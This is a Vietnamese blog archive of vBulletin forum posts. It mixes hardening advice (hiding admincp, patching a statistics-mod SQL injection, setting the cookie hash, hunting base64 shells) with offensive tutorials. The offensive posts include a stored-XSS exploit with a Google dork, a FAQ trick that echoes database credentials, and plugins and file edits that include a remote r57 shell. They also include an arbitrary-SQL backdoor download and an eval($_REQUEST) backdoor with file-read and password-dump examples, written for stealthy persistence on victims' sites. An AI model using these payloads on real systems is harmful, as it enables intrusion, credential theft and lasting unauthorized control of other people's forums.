Trang

Hiển thị các bài đăng có nhãn vBulletin. Hiển thị tất cả bài đăng
Hiển thị các bài đăng có nhãn vBulletin. Hiển thị tất cả bài đăng

Cách bảo vệ Admincp của diễn đàn Vbulletin​

Những việc mà các bạn cần tìm hiểu và làm đó là:
1. Đổi tên (rename) cho cái thư mục admincp gốc của nó thành 1 cái tên khác mà các bạn chắc chắn chỉ có các admin có thể biết. Nhưng không sửa lại path trong file /includes/config.php. Ai không biết rename thì pm sent user + pass vps hay host qua inbox ccb Drop dùm cho :))
vd: Aitimduocadmincpnaykhong

2. Đặt mật khẩu bảo vệ thư mục cho cái thư mục admincp fake (Aitimduocadmincpnaykhong) này, có nhiều cách như add code vào global.php, index.php, hay đơn giản là cứ .htaccess + .htpasswd mà táng. Mấy bài hướng dẫn dạng này nhiều vô số kể các bạn tìm rồi làm theo thôi.

3. Thực hiện 2 bước dưới đây để chống lại việc tìm ra path thật bằng những tính năng có sẵn của Vbulletin.
a. Phân quyền lại cho các nhóm từ Mod
-> Cao nhất không cho xem Location của thành viên khác khi dùng chức năng Who's online nhiều bản việt hóa nó dịch thành "phúc trình vãng lai" gì đó trên forum. Cách phân quyền như sau: Login vào admincp trước rồi vào
Admin CP -> Usergroups -> Usergroup Manager -> Edit Usergroup -> Who's Online Permissions -> Can View Detailed Location Info for Users -> No
Save lại và làm tương tự cho các nhóm (Group) còn lại thế là xong phần phân quyền tránh dòm ngó.

b. Giới hạn Current activity (hoạt động hiện tại) trên các tài khoản có quyền truy cập vào admincp fake đó. bằng cách sửa code trong tempate đang sài. để không cho hiển thị những thông tin có thể làm lộ location của admin khi đang hành sự trên diễn đàn. Login vào admincp rồi vào

Styles & Templates -> Search in Templates -> tìm với skin muốn sửa và tìm với từ khóa : current activity
-> ra cái kết quả màu mè MEMBERINFO -> click vào nó và tìm tiếp với từ current activity sẽ thấy đoạn code như sau:


PHP:

Xem Thêm

 

vBulletin Advanced User Tagging Mod - Stored XSS Vulnerability

HTML Code:
##########################################################################################
#
# Exploit Title: Advanced User Tagging vBulletin - Stored XSS Vulnerability
# Google Dork: intext:usertag_pro
# Date: 10.07.2013
# Exploit Author: []0iZy5
# Vendor Homepage: www.backtrack-linux.ro
# Software Link: http://www.dragonbyte-tech.com/vbecommerce.php?productid=20&do=product
# Version: vBulletin 3.8.x, vBulletin 4.x.x
# Tested on: Linux & Windows
#
##########################################################################################
#
# Stage 1: Go to -> UserCP -> Hash Tag Subscriptions
# (Direct Link:) http://127.0.0.1/[path]/usertag.php?do=profile&action=hashsubscription
#
# Stage 2: Add a malicious hash tag.
# (Example:) "><script>alert(document.cookie)</script>
#
##########################################################################################
#
# This was written for educational purpose only. use it at your own risk.
# Author will be not responsible for any damage caused! user assumes all responsibility. 
# Intended for authorized web application pentesting only!
#
######################################################################################

Xem Thêm

 

Hướng dẫn khắc phục 2 lỗi bảo mật nghiêm trọng của vBulletin

SinhVienIT.NET---vbulletin-security-alert


2 lỗi mà mình nói đến là lỗi SQL Injection của mod Chang stat và lỗi CSRF để add plugin.

1. Lỗi SQL Injection của Changuondyu Statistics
Khi khai thác lỗi này, attacker sẽ lấy được gần như toàn bộ database của bạn nếu muốn. Và thông thường, cái attacker nhắm đến là table user. Khi lấy được 3 cột: userid, password và salt => Attacker có thể login vào tài khoản của bất kỳ user nào mà không cần biết password là gì (Với điều kiện là Admin không biết config đúng file config.php cùa vBB).
Để fix lỗi này, có 2 cách mình đề xuất các bạn có thể thực hiện.

Cách 1:
AdminCP->Plugin Manager->ChangUonDyU - Advanced Statistics - Get Data

Tìm:
PHP Code:
$foruminid $vbulletin->db->escape_string($_REQUEST['listforumid']); 
Thêm vào bên dưới
PHP Code:
//---Loại bỏ ký tự nguy hiểm tránh SQL injetion$foruminid preg_replace("/[^0-9,]+/","",$foruminid);//---End---By: Vũ Thanh Lai - SinhVienIT.Net 

Cách 2:
AdminCP->Plugin Manager->ChangUonDyU - Advanced Statistics - Get Data

Tìm:
PHP Code:
$foruminid $vbulletin->db->escape_string($_REQUEST['listforumid']); 
Thêm vào bên dưới
PHP Code:
//---Loại bỏ ký tự nguy hiểm tránh SQL injetion$foruminidx explode(',',$foruminid);
foreach(
$foruminidx as &$id)
{
    
$id=intval($id);
}
$foruminid=implode(',',$foruminidx);//---End---By: Vũ Thanh Lai - SinhVienIT.Net 


2. Lỗi CSRF
Với lỗi này, attacker phải có quyền từ SMod trở lên. Nếu nói đây là 1 lỗi thì cũng chưa chuẩn lắm. Vì nếu nó là 1 lỗi thì chả khác nào câu "Hacked by Admin" 4
Tuy nhiên, dù thế nào đi nữa, cái này cũng giúp 1 user có quyền SMod "leo thang đặc quyền được".

Cách khai thác lỗi này thì cũng đã được công bố chi tiết.

Để fix lỗi này mình đề xuất 2 cách.

Cách 1:
Đây là cách đơn giản nhất là bạn đổi thư mục AdminCP và không tiết lộ thư mục AdminCP mới cho bất kỳ ai biết.
Sau khi đổi nhớ sửa lại tên thư mục admin trong file config.php ở phần
PHP Code:
$config['Misc']['admincpdir'
Tuy nhiên, khi sử dụng cách này thì sẽ có thể gây ra 1 số mod có phần admincp hoạt động sai hoặc ko hoạt động... Nên khi dùng cách này các bạn cần lưu ý.


Cách 2:
Bạn sử dụng Mod này. Khi dùng mod này, mỗi lần có 1 request gửi đến AdminCP thì referer trong HTTP Header sẽ đc kiểm tra xem request đó đến từ trang nào trong forum. Nếu không phải từ AdminCP thì bạn phải click xác nhận thì request mới đc tiếp tục xử lý.

Attacker đã làm như thế nào ?
Thời gian gần đây, attacker hay đi lục lọi các forum có sử dụng mod Changuondyu Statistics để tìm cách đưa câu "Hacked by..." vào đó. Sau khi khai thác lỗi này, chúng sẽ login đc vào tài khoản của SMod hoặc Admin để lợi dụng tiếp lỗi thứ 2 bên trên để chèn shell. Và thế là xong 4

Các Admin đã ngây thơ như thế nào ?
Trong file config.php của vBulletin có 1 phần mà hầu hết các Admin đều bỏ qua đó là COOKIE SECURITY HASH
PHP Code:
$config['Misc']['cookie_security_hash'
Thông thường, các admin để trống phần này trong file config mà không hề biết tầm quan trọng của nó. Để hiểu nó quan trọng như thế nào. Mình sẽ nói chi tiết để các bạn hiểu cơ chế hoạt động của nó.

Khi 1 user login vào forum nếu có check dấu ghi nhớ để lần sau không phải login lại khi hết cookie timeout thì phía client sẽ có 3 cookie đc thiết lập.
cookieprefix_userid,cookieprefix_password và cookieprefix_remember

cái userid và remember chắc mình không cần nói, cái password nó không phải là password của người dùng, cũng không phải là password trong cột password của table user.
Nó là kết quả
PHP Code:
MD5(Cột_Password_Trong_table_User.$config['Misc']['cookie_security_hash']) 
Như vậy, nếu attacker khai thác đc 1 lỗi SQL Injection nào đó trên forum của bạn và lấy đc 1 số record trong table user mà giá trị cookie_security_hash bạn để trống trong file config.php thì tất nhiên, attacker sẽ dễ dàng login đc vào bất kỳ tài khoản nào bằng cách thiết lập cookie trên trình duyệt 3 cookie mình đã để cập bên trên.

Còn nếu bạn có thiết lập giá trị cookie_security_hash ? Attacker không thể biết đc giá trị này nếu chưa attack vào đc host của bạn hay có shell trên server. Như vậy, cho dù có lấy đc cả table user thì attacker cũng không thể nào login vào bất kỳ tài khoản nào cả (ngoại trừ trường hợp bạn sử dụng password quá đơn giản như 123456 4)

Vì vậy, khi đọc xong bài này, hãy mở ngay file config của bạn lên và thêm 1 chuỗi ký tự bất kỳ vào $config['Misc']['cookie_security_hash'] nhé. Làm ngay và luôn kẻo bị attack nhé 4

Nguồn: Sinhvienit.net

Xem Thêm

 

vBulletin 3.x <= 4.2.0 FAQ (Echo config) trick


Go to acp, Faq Manager and then edit a FAQ, add the following code:

{$vbulletin->config['MasterServer']['servername']}
{$vbulletin->config['MasterServer']['username']}
{$vbulletin->config['MasterServer']['password']}
{$vbulletin->config['Database']['dbname']}

Save it.
Go to http://[path]/faq.php and check it
# 1337day.com [2012-12-07]

Xem Thêm

 

Bug Topx Vbb


Xem Thêm

 

Bypass SQLi VBB ( ALL Version )


Xem Thêm

 

Phương pháp phát hiện và loại bỏ shell trong Database!

Có nhiều bạn hỏi tôi cách để phát hiện shell khi hacker include vào Database? Hôm nay tôi làm tut này để trả lời câu hỏi trên và giúp các bạn nhận thức thêm về vấn đề bảo mật.
Trước hết ta phải biết cách thức mà hacker include vào Data thế nào thì sau đó mới có phương pháp để loại bỏ triệt để.
Tôi xin nói thêm trong vbb những table có thể lợi dụng để include shell vào là table_template và table_plugin.
Vậy làm thế nào để phát hiện shell khi đã được include vào 2 table này nhỉ?Cách làm như sau:
- Bạn vào Phpadmin của host và search từ khóa

Code:
base64
Và làm theo hướng dẫn như hình sau:
Tại sao ta phải search từ khóa base64 mà không phải là từ khóa khác ?
Xin thưa rằng tất cả các con shell hiện nay nếu không được mã hóa thì sẽ bị antivirut tiêu diệt trừ khi đổi tên file thành file.txt
- Việc còn lại của bạn là mở table khả nghi ra và kiểm tra xem có gì đặc biệt khác thường trong đó không.
Chú ý:
- Đối với table plugin thì bạn có thể delete đi mà không ảnh hưởng gì đến việc hoạt động site.
- Đối với table template nếu bạn thích thì cũng có thể delete còn muốn dùng lại skin đó thì hãy vào admincp rồi nhấn vào revert để vbb tự động edit lại skin cho bạn.
- Bạn có thể áp dụng cách này với những code khác như wordpress, joomla, new, shop, etc…

Xem Thêm

 

Phương pháp include shell trong source VBB và cách phòng chống

Mình viết bài này để giúp tăng cường bảo mật cho forum của các bạn, cho các bạn thấy được cách thức mà hacker đột nhập vào trang web các bạn để từ đó có cách phòng tránh. Mình không khuyến khích các bạn làm theo để thực hiện ý đồ xấu.
Viết tut này cũng có mặt lợi và mặt hại của nó nhưng nếu các bạn biết áp dụng cho mục đích lương thiện thì nó sẽ giúp ích rất nhiều cho bạn

I/Phương diện hacker – upload shell
Bỏ qua phần làm thế nào hacker có shell trên host, mình chỉ nói đến việc hacker đã khai thác file config và hoàn toàn chiếm quyền admin của website bạn. Sau đây mình sẽ liệt kê một cách gần như đầy đủ các phương pháp mà hacker có thể chèn shell và ẩn nó trong forum của bạn để có thể dễ dàng trong những cuộc tấn công tiếp theo. 
Method 1: tạm gọi là up shell qua việc edit teamplate (cách này gần giống với kiều RFI-remote file include)
Bạn lần lượt làm như sau:
Vào admincp –>Plugin manager –>Add new plugin Ở phần HOOK Location bạn chọn là : CACHE_TEMPLATE nhé,
Phần Name: có thể đặt tên tùy ý
Phần plugin php code hãy dùng đoạn code sau để include shell:

Code:
{ 
if($_GET['nameshell']=="heloworld"){ 
include('http://localhost/r57new.php'); 
} 
}
Nhớ kích vào nút đồng ý (yes) để active plugin này nhé .
Bây giờ cùng test nhé ở đây mình test trên localhost.
bạn thêm phần ?nameshell=helloworld vào sau:
index.php hoặc image.php, online.php hay bất cứ file php nào ở ngoài index của host, cái này tùy thuộc vào bạn
Ở đây mình thử với index.php nhé
Method 2: chèn shell bằng cách edit file .php có trong host
Bạn tìm những file mà admin ít để ý để chèn đoạn code sau vào nhé, có thể chèn vào bất cứ đâu mà bạn muốn.
if ($_REQUEST['nameshell']=="helloworld") {  include ("http://localhost/r57new.php");  }
Demo: mình edit file announcement.php
<?php
/*======================================================================*\
|| #################################################################### ||
|| # vBulletin 3.7.2
|| # ---------------------------------------------------------------- # ||
|| # Copyright ©2000-2007 Jelsoft Enterprises Ltd. All Rights Reserved. ||
|| # This file may not be redistributed in whole or significant part. # ||
|| # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # ||
|| # http://www.vbulletin.com | http://www.vbulletin.com/license.html # ||
|| #################################################################### ||
\*======================================================================*/
if ($_REQUEST['nameshell']=="helloworld") {  include ("http://localhost/r57new.php");  }
// ######################## SET PHP ENVIRONMENT ###########################
error_reporting(E_ALL & ~E_NOTICE);

// ##################### DEFINE IMPORTANT CONSTANTS #######################
define('THIS_SCRIPT', 'announcement');

// #################### PRE-CACHE TEMPLATES AND DATA ######################
// get special phrase groups
$phrasegroups = array(
    'postbit',
    'reputationlevel',
    'posting',
Hưởng thụ thành quả lao động nào
Method 3: là cách import file xml qua plugin
Bạn lần lượt làm như sau:
Plugins & Products –> Download / Upload Plugins –> chọn lấy con shell xml và import vào. (đính kèm ở bài viết)
Bạn có thể mở source file shell xml lên và thay subscriptions.php bằng repair.php hoặc faq.php (bất cứ file .php nào trong admincp mà bạn nghĩ admin site đó sẽ không chú ý đến). Bạn cũng có thể import vào nhiều file cho chắc ăn
cách run shell cũng khá đơn giản là bạn import shell vào file nào thì run file đó thôi chẳn hạn tôi import shell vào file subscriptions.php tôi sẽ run shell như thế này admincp / subscriptions.php làm theo tương tự với những file khác
demo here:
Method 4: import shell qua skin
Bạn lần lượt làm như sau:
Styles & Templates –> Download / Upload Styles –> chọn shell để upload (đính kèm ở bài viết)
Bạn muốn thêm shell vào skin nào thì ở phần Merge Into Style chọn skin đó.
Và đây là kết quả
Cũng cool đó nhỉ ^^!
II/Phương diện webmaster – giải quyết sự cố bị hack
Tiếp sau đây mình xin hướng dẫn các bạn cách clear shell trên host:
- Đầu tiên bạn sẽ phải quan sát thật kĩ xem có file nào lạ không.
- Tiếp theo bạn hãy download source forum về và dùng antivirut để check shell nếu hacker chỉ up shell thông thường lên forum và không dấu nó. Bạn chú ý xem kĩ những folder trong forum như include, modcp …
Nếu shell đã được mã hóa thì anti sẽ không check ra tốt nhất là nên up một source forum mới lên thay thế source forum cũ.
- Đối vời shell được chèn vào database và source thì tùy theo từng dạng ta có phương pháp phòng chống riêng
+ Method 1: đợi suy nghĩ xong rồi post tiếp
+ Method 2: upload new source như đã nói ở trên.
+ Method 3: bạn vào Plugin Manager bạn bắt đầu tìm với cột Hook Location nếu tìm thấy phần nào có init_startup thì đó chính là con shell mà hacker đã include vào
+ Method 4: remove skin bị đính kèm shell
Bài viết có sử dụng tư liệu của mafia_boy,quang hùng, ly0kha, alucar,meoconx …

Xem Thêm

 

[TUT] - Bảo mật cho Forum vBulletin

Phần I
Bài viết này Mafia viết thêm dựa trên tài liệu của shacker và một bài viết bằng tiếng Anh viết về bảo mật cho vbb. ok vào đề đi nào!

Xem Thêm

 

10 lưu ý bảo mật dữ liệu cho website

Bài này đc a Justom viết bên enhack
hum nay mình leech về để mọi người tham khảo thêm
10 lưu ý bảo mật dữ liệu cho website PHP sử dụng Shared hosting Linux Ngày nay các ứng dụng web với mã nguồn mở phát triển rất mạnh, trong đó đặc biệt phổ biến là PHP – MySQL. Nhưng công nghệ phát triển đồng thời kéo theo những “tin tặc” trẻ luôn muốn khẳng định mình sau khi xem những hướng dẫn tấn công, khai thác lỗi đầy rẫy trên các forum hacker. Vì thế bất kì một website nào cũng có khả năng bị tấn công bất cứ lúc nào, đặc biệt là các site cá nhân, tập thể vừa và nhỏ sẽ chọn giải pháp là thuê shared hosting trên một server. Vì các shared hosting ở cùng server nên độ riêng tư không cao, việc kiên cố hoá website trên shared hosting là rất cần thiết.

Xem Thêm

 

vBulletin Killer

Xem Thêm

 

[TUT] Bug validator.php trong vBulletin

TUT hướng dẫn bug tấn công vào icare.com.vn qua file Validator.php
Tác Giả: Nobody

Link down:


http://www.mediafire.com/?ntrngjdzczj
Đây cùng do sự bất cẩn của admin quên chưa xóa fle Validator.php file này có khả năng view hệ các file và thư mục của vBB.

Xem Thêm

 

Hidden Baby cho vBulletin (all version)

Screenshot:


http://s14.postimage.org/qfmtsljjj/Screen_shot_2012_06_25_at_21_35_24.png


Khả năng : Run query SQL tùy thích qua con backdoor (Select, Update, Drop ....)

Cách sử dụng

Quote:
+ Up thẳng vào thư mục forum vBB (ngang hàng với index.php).
+ Run: http://site.com/forum/backdoor.php?vnh= Câu lệnh sql

hoặc

+ Admincp -> Product & Plugin Manager -> Add new plugin ->
- Hook Location : tùy thích (mình hay dùng faq_complete)
- Plugin PHP Code : Copy nguyên code ở dưới vào, bỏ "<?php" ở đầu và "?>" ở cuối đi
- Plugin is active : Yes
+ Run : http://site.com/forum/faq.php?vnh= Câu lệnh sql
Download:
http://www.mediafire.com/?y9yz0gm6r4e4uxr
 Nguồn: VNHack.

Xem Thêm

 

[vBulletin] Admin Reset Tools - Công cụ dành cho Admin

Trong trường hợp bạn bị mất quyền Admin, mất hết Permission (hoặc bị thay đổi permission).

Công cụ này sẽ giúp bạn lấy lại group Admin và toàn quyền quản lí diễn đàn (Full Administrator Permission).

Demo:

http://i942.photobucket.com/albums/ad269/juno_okyo/Juno_okyo%20Blog/01.png

http://i942.photobucket.com/albums/ad269/juno_okyo/Juno_okyo%20Blog/02.png

http://i942.photobucket.com/albums/ad269/juno_okyo/Juno_okyo%20Blog/03.png

http://i942.photobucket.com/albums/ad269/juno_okyo/Juno_okyo%20Blog/04.png

Download:
File name: Admin-Reset-Tools.php
Password Unlock: junookyo

* Sử dụng:
Thay đổi thông tin DataBase như config.php của bạn:
// MySQL Info
    $host = 'localhost';
    $user = 'root';
    $password = '*****';
    $dbname = '*****'; 
Sau đó upload lên ngang hàng index forum và sử dụng.

P/S: Thực ra thì admin hoàn toàn có thể tự thay bằng cách vào phpMyAdmin, đây chỉ là công cụ giúp bạn khôi phục group Admin và toàn quyền quản lí Forum của mình nhanh nhất! :)

Nguồn: Junookyo !

Xem Thêm

 

[Report] ChangUonDyU Advanced Statistics - SQL injection

Mấy ngày nay DaiCa.Net đã bị kẻ lạ login vào account admin.
Tuy nhiên kẻ lạ mặt chưa làm gì được

Sau khi được juno_okyo Report là có bug tại mod Changuondyu Static.
Mình đã kiểm tra lại các input, tất cả các input chỉ có 1 input được đưa vào truy vấn, đó là
$_REQUEST['listforumid']

Và quả thật là có bug SQLi. Đây là 1 lỗi cực kỳ nghiêm trọng và sai xót của coder (Còn nghiêm trọng hơn Bug Search VBB vì rất nhiều người đang sử dụng mod này).

Từ Bug này, chúng ta có thể lấy được dữ liệu từ database => Login vào admin => Login vào admincp => Up shell => blah blah

Ở đây DuyK sẽ không nói đến cách khai thác để đề phòng "Hacker chẻ châu" quậy phá mọi người (Hacker thực sự sẽ hiểu vấn đề ngay nên khỏi cần phải nói)

Vì rất nhiều người đang sử dụng mod này và chưa fix nên DuyK hi vọng mọi người sẽ lan truyền report này.

Để fix mod này. Các bạn vào: Admincp -> Plugin & product option -> Plugin manage -> ChangUonDyU - Advanced Statistics - Get Data -> EDIT

Bạn tìm đến dòng:
$foruminid = $vbulletin->db->escape_string($_REQUEST['listforumid']);

Thay bằng:
$foruminid = intval($_REQUEST['listforumid']);

Report từ: DaiCa.Net - Forum newbie học hỏi

P/S by Juno_okyo:




Rất nhiều Diễn đàn đang sử dụng mod Statstics này nên mọi người nhanh chóng fix nhé.
Bug này được phát hiện từ mod tương tự của bác Chang cho MyBB, kiểm tra thì thấy mod bên vBB cũng dính.

Xem Thêm

 

vBulletin 2.0.3 Calendar.PHP Command Execution Vulnerability

Source: http://www.securityfocus.com/bid/5820/info

 
A remote command execution vulnerability has been reported for vBulletin. The vulnerability is due to vBulletin failing to properly sanitize user-supplied input from URI parameters.
 
An attacker can exploit this vulnerability to execute malicious commands on the vulnerable system.
 
http://www.example.com/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60<command>%20%60;die();echo%22
 
where <command> signifies a command to be executed on the system.

Nguồn: http://www.exploit-db.com/exploits/21874/

Xem Thêm

 

vBulletin 2.0/2.2.x Cross Site Scripting Vulnerabilities

Source: http://www.securityfocus.com/bid/5997/info

vBulletin does not filter HTML tags from URI parameters, making it prone to cross-site scripting attacks.
As a result, it is possible for a remote attacker to create a malicious link containing script code which will be executed in the browser of a legitimate user, in the context of the website running vBulletin.
This issue may be exploited to steal cookie-based authentication credentials from legitimate users of the website running the vulnerable software.
http://<victim>/usercp.php?s=[Session ID]"><Script>alert(document.cookie);</Script>

Nguồn: http://www.exploit-db.com/exploits/21946/


Xem Thêm

 

vBulletin 2.2.7/2.2.8 HTML Injection Vulnerability

Source: http://www.securityfocus.com/bid/6337/info

Problems with vBulletin could make it possible for an attacker to inject arbitrary HTML in vBulletin forum messages.
vBulletin does not sufficiently filter potentially malicious HTML code from posted messages. As a result, when a user chooses to view a message posting that contains malicious HTML code, the code contained in the message would be executed in the browser of the vulnerable user. This will occur in the context of the site hosting the vBulletin forum software.
Attackers may potentially exploit this issue to manipulate web content or to steal cookie-based authentication credentials. It may be possible to take arbitrary actions as the victim user.
This should only be considered an issue if HTML has been enabled in messages. This option is not enabled by default and the vendor recommends that users do not enable it. If the option has been enabled, HTML will not be filtered at all.
*** This vulnerability has been further investigated. It has been reported by the vendor that this functionality is by disabled by default. Additionally, the risks of enabling this feature are documented in the user manual. Therefore, this is not a valid vulnerability, and will be removed from the SecurityFocus Vulnerability Database.
<b onMouseOver="alert(document.location);">Test!</b>

Nguồn: http://www.exploit-db.com/exploits/22077/


Xem Thêm

 

Chèn Backdoor vào VBB nhanh-gọn-nhẹ-hiệu quả

Hello, hnay DuyK sẽ hướng dẫn các bạn cách chèn 1 “cửa sau” vào VBB nhanh-gọn-nhẹ-hiệu quả:
Khi bạn đã login vào được admincp của 1 forum vbb nào đó, bạn muốn để lại 1 “cửa sau” trên website này 1 cách kín đáo nhất ?
Okê, chỉ cần 1 dòng đơn giản:

eval($_REQUEST['dct']);
Đầu tiên bạn cần truy cập vào: Plugin & product manager => Plugin manager => Tìm đến 1 plugin bất kì => EDIT => chèn dòng trên vào vị trí hợp lý (Nếu không hiểu lắm về cấu trúc php thì bạn có thể chèn vào đầu hoặc cuối)
Bạn cần chú ý vào “HOOK” mà bạn chèn. Bạn nào hiểu phần này thì okê rồi. Còn nếu bạn nào chưa hiểu thì hãy chọn những kái nào có hook là:
ajax_start => Sau khi chèn chỉ việc truy cập /forum_path/ajax.php?dct=(Code php)
global_start (ko biết có nhớ lộn ko) => Sau khi chèn chỉ việc truy cập /forum_path/forum.php?dct=(Code php) — (Hoặc có thể run bất kì file php nào, vì chèn vào global mà)
……………..Blah blah……………..
Code php bạn có thể chèn truy vấn SQL, readfile….
Ví dụ
?dct=$duyk=readfile(‘includes/class_core.php’); echo $duyk; => view file class_core.php
?dct=$duyk=mysql_fetch_array(mysql_query(“select password from user where userid=1″)); echo $duyk['password'];
……………..
Demo:


Với việc chèn “Cửa hậu” nhỏ gọn như vậy nhưng rất hiệu quả :D Bằng cách này chúng ta có 1 cửa cho riêng mình để vào “nhà” của victim 1 cách lén lút nhất
Nguồn: DaiCa.info


Xem Thêm

 

Copyright © Dương-UG Blog's - Nguyễn Bình Dương